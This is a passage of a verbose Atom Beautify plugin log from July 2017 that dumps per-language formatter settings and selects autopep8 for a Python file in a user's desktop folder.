disabled: false,
default_beautifier: 'Fortran Beautifier',
beautify_on_save: false },
handlebars:
{ indent_inner_html: false,
indent_size: 2,
indent_char: ' ',
brace_style: 'collapse',
indent_scripts: 'normal',
wrap_line_length: 250,
wrap_attributes: 'auto',
wrap_attributes_indent_size: 2,
preserve_newlines: true,
max_preserve_newlines: 10,
unformatted: [Object],
end_with_newline: false,
extra_liners: [Object],
disabled: false,
default_beautifier: 'JS Beautify',
beautify_on_save: false },
haskell:
{ disabled: false,
default_beautifier: 'stylish-haskell',
beautify_on_save: false },
html:
{ indent_inner_html: false,
indent_size: 2,
indent_char: ' ',
brace_style: 'collapse',
indent_scripts: 'normal',
wrap_line_length: 250,
wrap_attributes: 'auto',
wrap_attributes_indent_size: 2,
preserve_newlines: true,
max_preserve_newlines: 10,
unformatted: [Object],
end_with_newline: false,
extra_liners: [Object],
disabled: false,
default_beautifier: 'JS Beautify',
beautify_on_save: false },
jade:
{ indent_size: 2,
indent_char: ' ',
disabled: false,
default_beautifier: 'Pug Beautify',
beautify_on_save: false },
java:
{ configPath: '',
disabled: false,
default_beautifier: 'Uncrustify',
beautify_on_save: false },
js:
{ indent_size: 2,
indent_char: ' ',
indent_level: 0,
indent_with_tabs: false,
preserve_newlines: true,
max_preserve_newlines: 10,
space_in_paren: false,
jslint_happy: false,
space_after_anon_function: false,
brace_style: 'collapse',
break_chained_methods: false,
keep_array_indentation: false,
keep_function_indentation: false,
space_before_conditional: true,
eval_code: false,
unescape_strings: false,
wrap_line_length: 0,
end_with_newline: false,
end_with_comma: false,
end_of_line: 'System Default',
disabled: false,
default_beautifier: 'JS Beautify',
beautify_on_save: false },
json:
{ indent_size: 2,
indent_char: ' ',
indent_level: 0,
indent_with_tabs: false,
preserve_newlines: true,
max_preserve_newlines: 10,
space_in_paren: false,
jslint_happy: false,
space_after_anon_function: false,
brace_style: 'collapse',
break_chained_methods: false,
keep_array_indentation: false,
keep_function_indentation: false,
space_before_conditional: true,
eval_code: false,
unescape_strings: false,
wrap_line_length: 0,
end_with_newline: false,
end_with_comma: false,
end_of_line: 'System Default',
disabled: false,
default_beautifier: 'JS Beautify',
beautify_on_save: false },
jsx:
{ e4x: true,
indent_size: 2,
indent_char: ' ',
indent_level: 0,
indent_with_tabs: false,
preserve_newlines: true,
max_preserve_newlines: 10,
space_in_paren: false,
jslint_happy: false,
space_after_anon_function: false,
brace_style: 'collapse',
break_chained_methods: false,
keep_array_indentation: false,
keep_function_indentation: false,
space_before_conditional: true,
eval_code: false,
unescape_strings: false,
wrap_line_length: 0,
end_with_newline: false,
end_with_comma: false,
end_of_line: 'System Default',
disabled: false,
default_beautifier: 'Pretty Diff',
beautify_on_save: false },
latex:
{ indent_char: ' ',
indent_with_tabs: false,
indent_preamble: false,
always_look_for_split_braces: true,
always_look_for_split_brackets: false,
remove_trailing_whitespace: false,
align_columns_in_environments: [Object],
disabled: false,
default_beautifier: 'Latex Beautify',
beautify_on_save: false },
less:
{ indent_size: 2,
indent_char: ' ',
newline_between_rules: true,
preserve_newlines: false,
wrap_line_length: 0,
indent_comments: true,
force_indentation: false,
convert_quotes: 'none',
align_assignments: false,
no_lead_zero: false,
configPath: '',
predefinedConfig: 'csscomb',
disabled: false,
default_beautifier: 'Pretty Diff',
beautify_on_save: false },
lua:
{ end_of_line: 'System Default',
disabled: false,
default_beautifier: 'Lua beautifier',
beautify_on_save: false },
markdown:
{ gfm: true,
yaml: true,
commonmark: false,
disabled: false,
default_beautifier: 'Tidy Markdown',
beautify_on_save: false },
marko:
{ indent_size: 2,
indent_char: ' ',
syntax: 'html',
indent_inner_html: false,
brace_style: 'collapse',
indent_scripts: 'normal',
wrap_line_length: 250,
wrap_attributes: 'auto',
wrap_attributes_indent_size: 2,
preserve_newlines: true,
max_preserve_newlines: 10,
unformatted: [Object],
end_with_newline: false,
extra_liners: [Object],
disabled: false,
default_beautifier: 'Marko Beautifier',
beautify_on_save: false },
mustache:
{ indent_inner_html: false,
indent_size: 2,
indent_char: ' ',
brace_style: 'collapse',
indent_scripts: 'normal',
wrap_line_length: 250,
wrap_attributes: 'auto',
wrap_attributes_indent_size: 2,
preserve_newlines: true,
max_preserve_newlines: 10,
unformatted: [Object],
end_with_newline: false,
extra_liners: [Object],
disabled: false,
default_beautifier: 'JS Beautify',
beautify_on_save: false },
nginx:
{ indent_size: 2,
indent_char: ' ',
indent_with_tabs: false,
dontJoinCurlyBracet: true,
disabled: false,
default_beautifier: 'Nginx Beautify',
beautify_on_save: false },
nunjucks:
{ indent_size: 2,
indent_char: ' ',
wrap_line_length: 250,
preserve_newlines: true,
disabled: false,
default_beautifier: 'Pretty Diff',
beautify_on_save: false },
objectivec:
{ configPath: '',
disabled: false,
default_beautifier: 'Uncrustify',
beautify_on_save: false },
ocaml:
{ disabled: false,
default_beautifier: 'ocp-indent',
beautify_on_save: false },
pawn:
{ configPath: '',
disabled: false,
default_beautifier: 'Uncrustify',
beautify_on_save: false },
perl:
{ perltidy_profile: '',
disabled: false,
default_beautifier: 'Perltidy',
beautify_on_save: false },
php:
{ cs_fixer_path: '',
cs_fixer_version: 2,
cs_fixer_config_file: '',
fixers: '',
level: '',
rules: '',
allow_risky: 'no',
phpcbf_path: '',
phpcbf_version: 2,
standard: 'PEAR',
disabled: false,
default_beautifier: 'PHP-CS-Fixer',
beautify_on_save: false },
puppet:
{ disabled: false,
default_beautifier: 'puppet-lint',
beautify_on_save: false },
python:
{ max_line_length: 79,
indent_size: 4,
ignore: [Object],
formater: 'autopep8',
style_config: 'pep8',
sort_imports: false,
multi_line_output: 'Hanging Grid Grouped',
disabled: false,
default_beautifier: 'autopep8',
beautify_on_save: false },
r:
{ indent_size: 2,
disabled: false,
default_beautifier: 'formatR',
beautify_on_save: false },
riot:
{ indent_size: 2,
indent_char: ' ',
wrap_line_length: 250,
preserve_newlines: true,
disabled: false,
default_beautifier: 'Pretty Diff',
beautify_on_save: false },
ruby:
{ indent_size: 2,
indent_char: ' ',
rubocop_path: '',
disabled: false,
default_beautifier: 'Rubocop',
beautify_on_save: false },
rust:
{ rustfmt_path: '',
disabled: false,
default_beautifier: 'rustfmt',
beautify_on_save: false },
sass:
{ disabled: false,
default_beautifier: 'SassConvert',
beautify_on_save: false },
scss:
{ indent_size: 2,
indent_char: ' ',
newline_between_rules: true,
preserve_newlines: false,
wrap_line_length: 0,
indent_comments: true,
force_indentation: false,
convert_quotes: 'none',
align_assignments: false,
no_lead_zero: false,
configPath: '',
predefinedConfig: 'csscomb',
disabled: false,
default_beautifier: 'Pretty Diff',
beautify_on_save: false },
spacebars:
{ indent_size: 2,
indent_char: ' ',
wrap_line_length: 250,
preserve_newlines: true,
disabled: false,
default_beautifier: 'Pretty Diff',
beautify_on_save: false },
sql:
{ indent_size: 2,
keywords: 'upper',
identifiers: 'unchanged',
disabled: false,
default_beautifier: 'sqlformat',
beautify_on_save: false },
svg:
{ indent_size: 2,
indent_char: ' ',
wrap_line_length: 250,
preserve_newlines: true,
disabled: false,
default_beautifier: 'Pretty Diff',
beautify_on_save: false },
swig:
{ indent_size: 2,
indent_char: ' ',
wrap_line_length: 250,
preserve_newlines: true,
disabled: false,
default_beautifier: 'Pretty Diff',
beautify_on_save: false },
tss:
{ indent_size: 2,
indent_char: ' ',
newline_between_rules: true,
preserve_newlines: false,
wrap_line_length: 0,
indent_comments: true,
force_indentation: false,
convert_quotes: 'none',
align_assignments: false,
no_lead_zero: false,
disabled: false,
default_beautifier: 'Pretty Diff',
beautify_on_save: false },
twig:
{ indent_size: 2,
indent_char: ' ',
indent_with_tabs: false,
preserve_newlines: true,
space_in_paren: false,
space_after_anon_function: false,
break_chained_methods: false,
wrap_line_length: 250,
end_with_comma: false,
disabled: false,
default_beautifier: 'Pretty Diff',
beautify_on_save: false },
typescript:
{ indent_size: 2,
indent_char: ' ',
indent_level: 0,
indent_with_tabs: false,
preserve_newlines: true,
max_preserve_newlines: 10,
space_in_paren: false,
jslint_happy: false,
space_after_anon_function: false,
brace_style: 'collapse',
break_chained_methods: false,
keep_array_indentation: false,
keep_function_indentation: false,
space_before_conditional: true,
eval_code: false,
unescape_strings: false,
wrap_line_length: 0,
end_with_newline: false,
end_with_comma: false,
end_of_line: 'System Default',
disabled: false,
default_beautifier: 'TypeScript Formatter',
beautify_on_save: false },
ux:
{ indent_size: 2,
indent_char: ' ',
wrap_line_length: 250,
preserve_newlines: true,
disabled: false,
default_beautifier: 'Pretty Diff',
beautify_on_save: false },
vala:
{ configPath: '',
disabled: false,
default_beautifier: 'Uncrustify',
beautify_on_save: false },
vue:
{ indent_size: 2,
indent_char: ' ',
indent_level: 0,
indent_with_tabs: false,
preserve_newlines: true,
max_preserve_newlines: 10,
space_in_paren: false,
jslint_happy: false,
space_after_anon_function: false,
brace_style: 'collapse',
break_chained_methods: false,
keep_array_indentation: false,
keep_function_indentation: false,
space_before_conditional: true,
eval_code: false,
unescape_strings: false,
wrap_line_length: 250,
end_with_newline: false,
end_with_comma: false,
end_of_line: 'System Default',
indent_inner_html: false,
indent_scripts: 'normal',
wrap_attributes: 'auto',
wrap_attributes_indent_size: 2,
unformatted: [Object],
extra_liners: [Object],
disabled: false,
default_beautifier: 'Vue Beautifier',
beautify_on_save: false },
visualforce:
{ indent_size: 2,
indent_char: ' ',
wrap_line_length: 250,
preserve_newlines: true,
disabled: false,
default_beautifier: 'Pretty Diff',
beautify_on_save: false },
xml:
{ indent_inner_html: false,
indent_size: 2,
indent_char: ' ',
brace_style: 'collapse',
indent_scripts: 'normal',
wrap_line_length: 250,
wrap_attributes: 'auto',
wrap_attributes_indent_size: 2,
preserve_newlines: true,
max_preserve_newlines: 10,
unformatted: [Object],
end_with_newline: false,
extra_liners: [Object],
disabled: false,
default_beautifier: 'Pretty Diff',
beautify_on_save: false },
xtemplate:
{ indent_size: 2,
indent_char: ' ',
wrap_line_length: 250,
preserve_newlines: true,
disabled: false,
default_beautifier: 'Pretty Diff',
beautify_on_save: false },
yaml:
{ padding: 0,
disabled: false,
default_beautifier: 'align-yaml',
beautify_on_save: false } },
{ _default: {} },
{ _default: {} },
{ _default: {} },
{ _default: {} },
{ _default: {} },
{ _default: {} },
{ _default: {} } ] Python C:\Users\xyz_MG\Desktop\XXXXXX\2017ncstisc\enc.py undefined
2017-07-23T12:31:34.241Z - verbose: [beautifiers\index.coffee] indent_size=1, indent_char= , indent_with_tabs=true, configPath=, disabled=false, default_beautifier=Uncrustify, beautify_on_save=false, configPath=, disabled=false, default_beautifier=Uncrustify, beautify_on_save=false, indent_size=2, disabled=false, default_beautifier=beautysh, beautify_on_save=false, configPath=, disabled=false, default_beautifier=Uncrustify, beautify_on_save=false, configPath=, disabled=false, default_beautifier=Uncrustify, beautify_on_save=false, disabled=false, default_beautifier=cljfmt, beautify_on_save=false, indent_size=2, indent_char= , indent_level=0, indent_with_tabs=false, preserve_newlines=true, max_preserve_newlines=10, space_in_paren=false, jslint_happy=false, space_after_anon_function=false, brace_style=collapse, break_chained_methods=false, keep_array_indentation=false, keep_function_indentation=false, space_before_conditional=true, eval_code=false, unescape_strings=false, wrap_line_length=0, end_with_newline=false, end_with_comma=false, end_of_line=System Default, disabled=false, default_beautifier=coffee-fmt, beautify_on_save=false, indent_size=2, indent_char= , wrap_line_length=250, preserve_newlines=true, disabled=false, default_beautifier=Pretty Diff, beautify_on_save=false, configPath=, disabled=false, default_beautifier=Uncrustify, beautify_on_save=false, disabled=false, default_beautifier=Crystal, beautify_on_save=false, indent_size=2, indent_char= , selector_separator_newline=false, newline_between_rules=true, preserve_newlines=false, wrap_line_length=0, end_with_newline=false, indent_comments=true, force_indentation=false, convert_quotes=none, align_assignments=false, no_lead_zero=false, configPath=, predefinedConfig=csscomb, disabled=false, default_beautifier=JS Beautify, beautify_on_save=false, disabled=false, default_beautifier=Pretty Diff, beautify_on_save=false, configPath=, disabled=false, default_beautifier=Uncrustify, beautify_on_save=false, indent_size=2, indent_char= , indent_level=0, indent_with_tabs=false, preserve_newlines=true, max_preserve_newlines=10, space_in_paren=false, jslint_happy=false, space_after_anon_function=false, brace_style=collapse, break_chained_methods=false, keep_array_indentation=false, keep_function_indentation=false, space_before_conditional=true, eval_code=false, unescape_strings=false, wrap_line_length=250, end_with_newline=false, end_with_comma=false, end_of_line=System Default, indent_inner_html=false, indent_scripts=normal, wrap_attributes=auto, wrap_attributes_indent_size=2, unformatted=[a, abbr, area, audio, b, bdi, bdo, br, button, canvas, cite, code, data, datalist, del, dfn, em, embed, i, iframe, img, input, ins, kbd, keygen, label, map, mark, math, meter, noscript, object, output, progress, q, ruby, s, samp, select, small, span, strong, sub, sup, svg, template, textarea, time, u, var, video, wbr, text, acronym, address, big, dt, ins, small, strike, tt, pre, h1, h2, h3, h4, h5, h6], extra_liners=[head, body, /html], disabled=false, default_beautifier=JS Beautify, beautify_on_save=false, disabled=false, default_beautifier=elm-format, beautify_on_save=false, indent_size=2, indent_char= , wrap_line_length=250, preserve_newlines=true, disabled=false, default_beautifier=Pretty Diff, beautify_on_save=false, disabled=false, default_beautifier=erl_tidy, beautify_on_save=false, indent_size=2, indent_char= , disabled=false, default_beautifier=Gherkin formatter, beautify_on_save=false, configPath=, disabled=false, default_beautifier=clang-format, beautify_on_save=false, disabled=false, default_beautifier=gofmt, beautify_on_save=false, indent_size=2, indent_char= , wrap_line_length=250, preserve_newlines=true, disabled=false, default_beautifier=Pretty Diff, beautify_on_save=false, emacs_path=, emacs_script_path=, disabled=false, default_beautifier=Fortran Beautifier, beautify_on_save=false, indent_inner_html=false, indent_size=2, indent_char= , brace_style=collapse, indent_scripts=normal, wrap_line_length=250, wrap_attributes=auto, wrap_attributes_indent_size=2, preserve_newlines=true, max_preserve_newlines=10, unformatted=[a, abbr, area, audio, b, bdi, bdo, br, button, canvas, cite, code, data, datalist, del, dfn, em, embed, i, iframe, img, input, ins, kbd, keygen, label, map, mark, math, meter, noscript, object, output, progress, q, ruby, s, samp, select, small, span, strong, sub, sup, svg, template, textarea, time, u, var, video, wbr, text, acronym, address, big, dt, ins, small, strike, tt, pre, h1, h2, h3, h4, h5, h6], end_with_newline=false, extra_liners=[head, body, /html], disabled=false, default_beautifier=JS Beautify, beautify_on_save=false, disabled=false, default_beautifier=stylish-haskell, beautify_on_save=false, indent_inner_html=false, indent_size=2, indent_char= , brace_style=collapse, indent_scripts=normal, wrap_line_length=250, wrap_attributes=auto, wrap_attributes_indent_size=2, preserve_newlines=true, max_preserve_newlines=10, unformatted=[a, abbr, area, audio, b, bdi, bdo, br, button, canvas, cite, code, data, datalist, del, dfn, em, embed, i, iframe, img, input, ins, kbd, keygen, label, map, mark, math, meter, noscript, object, output, progress, q, ruby, s, samp, select, small, span, strong, sub, sup, svg, template, textarea, time, u, var, video, wbr, text, acronym, address, big, dt, ins, small, strike, tt, pre, h1, h2, h3, h4, h5, h6], end_with_newline=false, extra_liners=[head, body, /html], disabled=false, default_beautifier=JS Beautify, beautify_on_save=false, indent_size=2, indent_char= , disabled=false, default_beautifier=Pug Beautify, beautify_on_save=false, configPath=, disabled=false, default_beautifier=Uncrustify, beautify_on_save=false, indent_size=2, indent_char= , indent_level=0, indent_with_tabs=false, preserve_newlines=true, max_preserve_newlines=10, space_in_paren=false, jslint_happy=false, space_after_anon_function=false, brace_style=collapse, break_chained_methods=false, keep_array_indentation=false, keep_function_indentation=false, space_before_conditional=true, eval_code=false, unescape_strings=false, wrap_line_length=0, end_with_newline=false, end_with_comma=false, end_of_line=System Default, disabled=false, default_beautifier=JS Beautify, beautify_on_save=false, indent_size=2, indent_char= , indent_level=0, indent_with_tabs=false, preserve_newlines=true, max_preserve_newlines=10, space_in_paren=false, jslint_happy=false, space_after_anon_function=false, brace_style=collapse, break_chained_methods=false, keep_array_indentation=false, keep_function_indentation=false, space_before_conditional=true, eval_code=false, unescape_strings=false, wrap_line_length=0, end_with_newline=false, end_with_comma=false, end_of_line=System Default, disabled=false, default_beautifier=JS Beautify, beautify_on_save=false, e4x=true, indent_size=2, indent_char= , indent_level=0, indent_with_tabs=false, preserve_newlines=true, max_preserve_newlines=10, space_in_paren=false, jslint_happy=false, space_after_anon_function=false, brace_style=collapse, break_chained_methods=false, keep_array_indentation=false, keep_function_indentation=false, space_before_conditional=true, eval_code=false, unescape_strings=false, wrap_line_length=0, end_with_newline=false, end_with_comma=false, end_of_line=System Default, disabled=false, default_beautifier=Pretty Diff, beautify_on_save=false, indent_char= , indent_with_tabs=false, indent_preamble=false, always_look_for_split_braces=true, always_look_for_split_brackets=false, remove_trailing_whitespace=false, align_columns_in_environments=[tabular, matrix, bmatrix, pmatrix], disabled=false, default_beautifier=Latex Beautify, beautify_on_save=false, indent_size=2, indent_char= , newline_between_rules=true, preserve_newlines=false, wrap_line_length=0, indent_comments=true, force_indentation=false, convert_quotes=none, align_assignments=false, no_lead_zero=false, configPath=, predefinedConfig=csscomb, disabled=false, default_beautifier=Pretty Diff, beautify_on_save=false, end_of_line=System Default, disabled=false, default_beautifier=Lua beautifier, beautify_on_save=false, gfm=true, yaml=true, commonmark=false, disabled=false, default_beautifier=Tidy Markdown, beautify_on_save=false, indent_size=2, indent_char= , syntax=html, indent_inner_html=false, brace_style=collapse, indent_scripts=normal, wrap_line_length=250, wrap_attributes=auto, wrap_attributes_indent_size=2, preserve_newlines=true, max_preserve_newlines=10, unformatted=[a, abbr, area, audio, b, bdi, bdo, br, button, canvas, cite, code, data, datalist, del, dfn, em, embed, i, iframe, img, input, ins, kbd, keygen, label, map, mark, math, meter, noscript, object, output, progress, q, ruby, s, samp, select, small, span, strong, sub, sup, svg, template, textarea, time, u, var, video, wbr, text, acronym, address, big, dt, ins, small, strike, tt, pre, h1, h2, h3, h4, h5, h6], end_with_newline=false, extra_liners=[head, body, /html], disabled=false, default_beautifier=Marko Beautifier, beautify_on_save=false, indent_inner_html=false, indent_size=2, indent_char= , brace_style=collapse, indent_scripts=normal, wrap_line_length=250, wrap_attributes=auto, wrap_attributes_indent_size=2, preserve_newlines=true, max_preserve_newlines=10, unformatted=[a, abbr, area, audio, b, bdi, bdo, br, button, canvas, cite, code, data, datalist, del, dfn, em, embed, i, iframe, img, input, ins, kbd, keygen, label, map, mark, math, meter, noscript, object, output, progress, q, ruby, s, samp, select, small, span, strong, sub, sup, svg, template, textarea, time, u, var, video, wbr, text, acronym, address, big, dt, strike, tt, pre, h1, h2, h3, h4, h5, h6], end_with_newline=false, extra_liners=[head, body, /html], disabled=false, default_beautifier=JS Beautify, beautify_on_save=false, indent_size=2, indent_char= , indent_with_tabs=false, dontJoinCurlyBracet=true, disabled=false, default_beautifier=Nginx Beautify, beautify_on_save=false, indent_size=2, indent_char= , wrap_line_length=250, preserve_newlines=true, disabled=false, default_beautifier=Pretty Diff, beautify_on_save=false, configPath=, disabled=false, default_beautifier=Uncrustify, beautify_on_save=false, disabled=false, default_beautifier=ocp-indent, beautify_on_save=false, configPath=, disabled=false, default_beautifier=Uncrustify, beautify_on_save=false, perltidy_profile=, disabled=false, default_beautifier=Perltidy, beautify_on_save=false, cs_fixer_path=, cs_fixer_version=2, cs_fixer_config_file=, fixers=, level=, rules=, allow_risky=no, phpcbf_path=, phpcbf_version=2, standard=PEAR, disabled=false, default_beautifier=PHP-CS-Fixer, beautify_on_save=false, disabled=false, default_beautifier=puppet-lint, beautify_on_save=false, max_line_length=79, indent_size=4, ignore=[E24], formater=autopep8, style_config=pep8, sort_imports=false, multi_line_output=Hanging Grid Grouped, disabled=false, default_beautifier=autopep8, beautify_on_save=false, indent_size=2, disabled=false, default_beautifier=formatR, beautify_on_save=false, indent_size=2, indent_char= , wrap_line_length=250, preserve_newlines=true, disabled=false, default_beautifier=Pretty Diff, beautify_on_save=false, indent_size=2, indent_char= , rubocop_path=, disabled=false, default_beautifier=Rubocop, beautify_on_save=false, rustfmt_path=, disabled=false, default_beautifier=rustfmt, beautify_on_save=false, disabled=false, default_beautifier=SassConvert, beautify_on_save=false, indent_size=2, indent_char= , newline_between_rules=true, preserve_newlines=false, wrap_line_length=0, indent_comments=true, force_indentation=false, convert_quotes=none, align_assignments=false, no_lead_zero=false, configPath=, predefinedConfig=csscomb, disabled=false, default_beautifier=Pretty Diff, beautify_on_save=false, indent_size=2, indent_char= , wrap_line_length=250, preserve_newlines=true, disabled=false, default_beautifier=Pretty Diff, beautify_on_save=false, indent_size=2, keywords=upper, identifiers=unchanged, disabled=false, default_beautifier=sqlformat, beautify_on_save=false, indent_size=2, indent_char= , wrap_line_length=250, preserve_newlines=true, disabled=false, default_beautifier=Pretty Diff, beautify_on_save=false, indent_size=2, indent_char= , wrap_line_length=250, preserve_newlines=true, disabled=false, default_beautifier=Pretty Diff, beautify_on_save=false, indent_size=2, indent_char= , newline_between_rules=true, preserve_newlines=false, wrap_line_length=0, indent_comments=true, force_indentation=false, convert_quotes=none, align_assignments=false, no_lead_zero=false, disabled=false, default_beautifier=Pretty Diff, beautify_on_save=false, indent_size=2, indent_char= , indent_with_tabs=false, preserve_newlines=true, space_in_paren=false, space_after_anon_function=false, break_chained_methods=false, wrap_line_length=250, end_with_comma=false, disabled=false, default_beautifier=Pretty Diff, beautify_on_save=false, indent_size=2, indent_char= , indent_level=0, indent_with_tabs=false, preserve_newlines=true, max_preserve_newlines=10, space_in_paren=false, jslint_happy=false, space_after_anon_function=false, brace_style=collapse, break_chained_methods=false, keep_array_indentation=false, keep_function_indentation=false, space_before_conditional=true, eval_code=false, unescape_strings=false, wrap_line_length=0, end_with_newline=false, end_with_comma=false, end_of_line=System Default, disabled=false, default_beautifier=TypeScript Formatter, beautify_on_save=false, indent_size=2, indent_char= , wrap_line_length=250, preserve_newlines=true, disabled=false, default_beautifier=Pretty Diff, beautify_on_save=false, configPath=, disabled=false, default_beautifier=Uncrustify, beautify_on_save=false, indent_size=2, indent_char= , indent_level=0, indent_with_tabs=false, preserve_newlines=true, max_preserve_newlines=10, space_in_paren=false, jslint_happy=false, space_after_anon_function=false, brace_style=collapse, break_chained_methods=false, keep_array_indentation=false, keep_function_indentation=false, space_before_conditional=true, eval_code=false, unescape_strings=false, wrap_line_length=250, end_with_newline=false, end_with_comma=false, end_of_line=System Default, indent_inner_html=false, indent_scripts=normal, wrap_attributes=auto, wrap_attributes_indent_size=2, unformatted=[a, abbr, area, audio, b, bdi, bdo, br, button, canvas, cite, code, data, datalist, del, dfn, em, embed, i, iframe, img, input, ins, kbd, keygen, label, map, mark, math, meter, noscript, object, output, progress, q, ruby, s, samp, select, small, span, strong, sub, sup, svg, template, textarea, time, u, var, video, wbr, text, acronym, address, big, dt, ins, small, strike, tt, pre, h1, h2, h3, h4, h5, h6], extra_liners=[head, body, /html], disabled=false, default_beautifier=Vue Beautifier, beautify_on_save=false, indent_size=2, indent_char= , wrap_line_length=250, preserve_newlines=true, disabled=false, default_beautifier=Pretty Diff, beautify_on_save=false, indent_inner_html=false, indent_size=2, indent_char= , brace_style=collapse, indent_scripts=normal, wrap_line_length=250, wrap_attributes=auto, wrap_attributes_indent_size=2, preserve_newlines=true, max_preserve_newlines=10, unformatted=[a, abbr, area, audio, b, bdi, bdo, br, button, canvas, cite, code, data, datalist, del, dfn, em, embed, i, iframe, img, input, ins, kbd, keygen, label, map, mark, math, meter, noscript, object, output, progress, q, ruby, s, samp, select, small, span, strong, sub, sup, svg, template, textarea, time, u, var, video, wbr, text, acronym, address, big, dt, ins, small, strike, tt, pre, h1, h2, h3, h4, h5, h6], end_with_newline=false, extra_liners=[head, body, /html], disabled=false, default_beautifier=Pretty Diff, beautify_on_save=false, indent_size=2, indent_char= , wrap_line_length=250, preserve_newlines=true, disabled=false, default_beautifier=Pretty Diff, beautify_on_save=false, padding=0, disabled=false, default_beautifier=align-yaml, beautify_on_save=false, , , , , , ,
2017-07-23T12:31:34.246Z - verbose: [beautifiers\index.coffee] [ { name: 'Python',
namespace: 'python',
scope: [ 'source.python' ],
grammars: [ 'Python' ],
extensions: [ 'py' ],
options:
{ max_line_length: [Object],
indent_size: [Object],
ignore: [Object],
formater: [Object],
style_config: [Object],
sort_imports: [Object],
multi_line_output: [Object] } } ] 'Python' 'py'
2017-07-23T12:31:34.247Z - verbose: [beautifiers\index.coffee] Language Python supported
2017-07-23T12:31:34.247Z - verbose: [beautifiers\index.coffee] getOptions selections [ 'python' ] indent_size=1, indent_char= , indent_with_tabs=true, configPath=, disabled=false, default_beautifier=Uncrustify, beautify_on_save=false, configPath=, disabled=false, default_beautifier=Uncrustify, beautify_on_save=false, indent_size=2, disabled=false, default_beautifier=beautysh, beautify_on_save=false, configPath=, disabled=false, default_beautifier=Uncrustify, beautify_on_save=false, configPath=, disabled=false, default_beautifier=Uncrustify, beautify_on_save=false, disabled=false, default_beautifier=cljfmt, beautify_on_save=false, indent_size=2, indent_char= , indent_level=0, indent_with_tabs=false, preserve_newlines=true, max_preserve_newlines=10, space_in_paren=false, jslint_happy=false, space_after_anon_function=false, brace_style=collapse, break_chained_methods=false, keep_array_indentation=false, keep_function_indentation=false, space_before_conditional=true, eval_code=false, unescape_strings=false, wrap_line_length=0, end_with_newline=false, end_with_comma=false, end_of_line=System Default, disabled=false, default_beautifier=coffee-fmt, beautify_on_save=false, indent_size=2, indent_char= , wrap_line_length=250, preserve_newlines=true, disabled=false, default_beautifier=Pretty Diff, beautify_on_save=false, configPath=, disabled=false, default_beautifier=Uncrustify, beautify_on_save=false, disabled=false, default_beautifier=Crystal, beautify_on_save=false, indent_size=2, indent_char= , selector_separator_newline=false, newline_between_rules=true, preserve_newlines=false, wrap_line_length=0, end_with_newline=false, indent_comments=true, force_indentation=false, convert_quotes=none, align_assignments=false, no_lead_zero=false, configPath=, predefinedConfig=csscomb, disabled=false, default_beautifier=JS Beautify, beautify_on_save=false, disabled=false, default_beautifier=Pretty Diff, beautify_on_save=false, configPath=, disabled=false, default_beautifier=Uncrustify, beautify_on_save=false, indent_size=2, indent_char= , indent_level=0, indent_with_tabs=false, preserve_newlines=true, max_preserve_newlines=10, space_in_paren=false, jslint_happy=false, space_after_anon_function=false, brace_style=collapse, break_chained_methods=false, keep_array_indentation=false, keep_function_indentation=false, space_before_conditional=true, eval_code=false, unescape_strings=false, wrap_line_length=250, end_with_newline=false, end_with_comma=false, end_of_line=System Default, indent_inner_html=false, indent_scripts=normal, wrap_attributes=auto, wrap_attributes_indent_size=2, unformatted=[a, abbr, area, audio, b, bdi, bdo, br, button, canvas, cite, code, data, datalist, del, dfn, em, embed, i, iframe, img, input, ins, kbd, keygen, label, map, mark, math, meter, noscript, object, output, progress, q, ruby, s, samp, select, small, span, strong, sub, sup, svg, template, textarea, time, u, var, video, wbr, text, acronym, address, big, dt, ins, small, strike, tt, pre, h1, h2, h3, h4, h5, h6], extra_liners=[head, body, /html], disabled=false, default_beautifier=JS Beautify, beautify_on_save=false, disabled=false, default_beautifier=elm-format, beautify_on_save=false, indent_size=2, indent_char= , wrap_line_length=250, preserve_newlines=true, disabled=false, default_beautifier=Pretty Diff, beautify_on_save=false, disabled=false, default_beautifier=erl_tidy, beautify_on_save=false, indent_size=2, indent_char= , disabled=false, default_beautifier=Gherkin formatter, beautify_on_save=false, configPath=, disabled=false, default_beautifier=clang-format, beautify_on_save=false, disabled=false, default_beautifier=gofmt, beautify_on_save=false, indent_size=2, indent_char= , wrap_line_length=250, preserve_newlines=true, disabled=false, default_beautifier=Pretty Diff, beautify_on_save=false, emacs_path=, emacs_script_path=, disabled=false, default_beautifier=Fortran Beautifier, beautify_on_save=false, indent_inner_html=false, indent_size=2, indent_char= , brace_style=collapse, indent_scripts=normal, wrap_line_length=250, wrap_attributes=auto, wrap_attributes_indent_size=2, preserve_newlines=true, max_preserve_newlines=10, unformatted=[a, abbr, area, audio, b, bdi, bdo, br, button, canvas, cite, code, data, datalist, del, dfn, em, embed, i, iframe, img, input, ins, kbd, keygen, label, map, mark, math, meter, noscript, object, output, progress, q, ruby, s, samp, select, small, span, strong, sub, sup, svg, template, textarea, time, u, var, video, wbr, text, acronym, address, big, dt, ins, small, strike, tt, pre, h1, h2, h3, h4, h5, h6], end_with_newline=false, extra_liners=[head, body, /html], disabled=false, default_beautifier=JS Beautify, beautify_on_save=false, disabled=false, default_beautifier=stylish-haskell, beautify_on_save=false, indent_inner_html=false, indent_size=2, indent_char= , brace_style=collapse, indent_scripts=normal, wrap_line_length=250, wrap_attributes=auto, wrap_attributes_indent_size=2, preserve_newlines=true, max_preserve_newlines=10, unformatted=[a, abbr, area, audio, b, bdi, bdo, br, button, canvas, cite, code, data, datalist, del, dfn, em, embed, i, iframe, img, input, ins, kbd, keygen, label, map, mark, math, meter, noscript, object, output, progress, q, ruby, s, samp, select, small, span, strong, sub, sup, svg, template, textarea, time, u, var, video, wbr, text, acronym, address, big, dt, ins, small, strike, tt, pre, h1, h2, h3, h4, h5, h6], end_with_newline=false, extra_liners=[head, body, /html], disabled=false, default_beautifier=JS Beautify, beautify_on_save=false, indent_size=2, indent_char= , disabled=false, default_beautifier=Pug Beautify, beautify_on_save=false, configPath=, disabled=false, default_beautifier=Uncrustify, beautify_on_save=false, indent_size=2, indent_char= , indent_level=0, indent_with_tabs=false, preserve_newlines=true, max_preserve_newlines=10, space_in_paren=false, jslint_happy=false, space_after_anon_function=false, brace_style=collapse, break_chained_methods=false, keep_array_indentation=false, keep_function_indentation=false, space_before_conditional=true, eval_code=false, unescape_strings=false, wrap_line_length=0, end_with_newline=false, end_with_comma=false, end_of_line=System Default, disabled=false, default_beautifier=JS Beautify, beautify_on_save=false, indent_size=2, indent_char= , indent_level=0, indent_with_tabs=false, preserve_newlines=true, max_preserve_newlines=10, space_in_paren=false, jslint_happy=false, space_after_anon_function=false, brace_style=collapse, break_chained_methods=false, keep_array_indentation=false, 